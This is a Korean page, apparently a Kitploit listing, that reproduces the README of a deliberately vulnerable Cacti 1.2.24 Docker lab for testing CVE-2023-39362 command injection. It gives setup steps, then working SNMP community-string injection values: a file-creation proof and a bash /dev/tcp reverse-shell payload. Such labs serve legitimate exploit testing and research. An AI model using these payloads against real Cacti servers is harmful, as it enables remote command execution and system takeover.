cacti-rce-snmp-options-vulnerable-application — 경고: 이것은 Cacti 명령 삽입(CVE-2023-39362) 취약점을 테스트하기 위한 취약한 애플리케이션입니다. 실행 시 책임은 본인에게 있습니다! | Kitploit
도구 / GitHub / m3ssap0 / cacti-rce-snmp-options-vulnerable-application
m3ssap0/cacti-rce-snmp-options-vulnerable-application cacti-rce-snmp-options-vulnerable-application 경고: 이것은 Cacti 명령 삽입(CVE-2023-39362) 취약점을 테스트하기 위한 취약한 애플리케이션입니다. 실행 시 책임은 본인에게 있습니다!
2 1년 전커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.
지난 7일 지난 30일
Cacti v1.2.24 인증된 명령 주입 (CVE-2023-39362) 취약 애플리케이션
이것은 Cacti 취약점 (CVE-2023-39362 )에 대한 익스플로잇을 테스트하기 위한 취약 애플리케이션입니다.
경고!
이 애플리케이션은 심각한 보안 취약점을 포함하고 있습니다. 실행 시 본인이 책임을 져야 합니다! 백업되고 격리된 환경(예: 최근 스냅샷 및 호스트 전용 네트워킹을 사용하는 VM)을 사용하는 것이 좋습니다. 이 애플리케이션을 인터넷에 노출된 서버에 업로드하지 마십시오. 침해될 수 있습니다.
면책 조항 : 본인은 누군가 이 애플리케이션을 사용하는 방식에 대해 책임을 지지 않습니다. 이 애플리케이션의 유일한 목적은 CVE-2023-39362 익스플로잇을 위한 테스트 시나리오이며 악의적으로 사용되어서는 안 됩니다. 이 애플리케이션을 설치하여 서버가 침해된 경우, 이는 제 책임이 아니라 업로드하고 설치한 사람(들)의 책임입니다.
취약점 정보
사용법
다음은 환경을 설정 하는 단계입니다:
docker compose up -d를 실행하여 구성을 시작합니다.
http://127.0.0.1/cacti 로 이동하여 Cacti 초기화 마법사를 시작하여 단계를 완료할 수 있습니다. 데이터베이스 관련 오류가 발생하면 잠시 기다렸다가 페이지를 새로고침하세요.
기본 자격 증명은 admin/ 입니다.
admin
마법사 중에 모든 버튼에 대해 "Next "를 누르고 그에 따라 옵션을 선택하세요. 모든 기본값은 괜찮으며 모든 필수 전제 조건이 충족되어야 합니다.
설치 후 admin으로 로그인하세요.
"Console " > "Configuration " > "User "로 이동하세요.
guest 사용자를 클릭하세요.
"Enable "을 활성화하고 비밀번호를 설정한 후 원하는 경우 "Must Change Password at Next Login "을 비활성화하세요.
"Save " 버튼을 클릭하세요.
"Permissions " 섹션으로 이동하세요.
"General Administration " 아래에서 "Console Access "와 "Sites/Devices/Data "를 활성화하세요.
"Save " 버튼을 클릭하세요.
로그아웃한 후 guest로 다시 로그인하여 익스플로잇을 시도하세요. 테스트 SNMP 장치의 호스트 이름은 monitored_snmp_device입니다.
환경을 정리 하려면 docker compose down 명령을 사용하세요.
Cacti의 공식 설치 가이드는 여기 에서 찾을 수 있습니다.
근본 원인
익스플로잇 (이것은 가능한 하나의 익스플로잇일 뿐입니다.)
"Console " > "Create " > "New Device "로 이동하세요.
SNMP 버전 1 또는 2를 지원하는 장치를 생성하세요.
장치에 다음 템플릿 중 하나 이상의 그래프가 있는지 확인하세요:
"Net-SNMP - Combined SCSI Disk Bytes "
"Net-SNMP - Combined SCSI Disk I/O "
("Net-SNMP Device " 템플릿에서 장치를 생성하면 그래프 전제 조건이 충족됩니다.)
"SNMP Options "에서 "SNMP Community String " 필드에 다음과 같은 값을 사용하세요: public\' ; touch /tmp/m3ssap0 ; \'.
"Create " 버튼을 클릭하세요.
/tmp 아래에 생성된 파일이 있는지 확인하세요.
리버스 셸을 얻으려면 다음과 같은 페이로드를 사용할 수 있습니다.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
저자
Antonio Francesco Sardella - 취약점 보고자 - m3ssap0
라이선스 이 프로젝트는 Unlicense에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요.